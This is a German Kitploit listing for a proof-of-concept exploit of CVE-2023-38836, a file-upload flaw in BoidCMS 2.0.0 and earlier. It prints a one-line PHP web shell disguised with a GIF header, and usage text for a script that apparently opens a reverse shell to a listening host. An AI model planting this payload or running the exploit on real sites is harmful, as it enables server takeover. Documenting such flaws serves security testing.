Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38836 — PoC-Exploit für Datei-Upload-Sicherheitslücke in BoidCMS Version <=2.0.0 | Kitploit
Tools/GitHubGitHub/1337kid/cve-2023-38836
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHub1337kid/cve-2023-38836

CVE-2023-38836

PoC-Exploit für Datei-Upload-Sicherheitslücke in BoidCMS Version <=2.0.0

Repository anzeigen
51vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38836 Exploit

Datei-Upload-Schwachstelle in BoidCMS v.2.0.0 erlaubt einem authentifizierten Angreifer, eine Datei mit gefährlichem Typ hochzuladen (CWE-434).
Zur Ausnutzung könnte ein Angreifer einen GIF-Header hinzufügen, um MIME-Typ-Prüfungen zu umgehen.

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

Verwendung

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit für CVE-2023-38836

options:
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm
  -u URL, --url URL     Website-URL
  -U USER, --user USER  Admin-Benutzername
  -P PASSWD, --passwd PASSWD
                        Admin-Passwort
  -l LHOST, --lhost LHOST
                        Lausch-Host
  -p LPORT, --lport LPORT
                        Lausch-Port

Tool herunterladen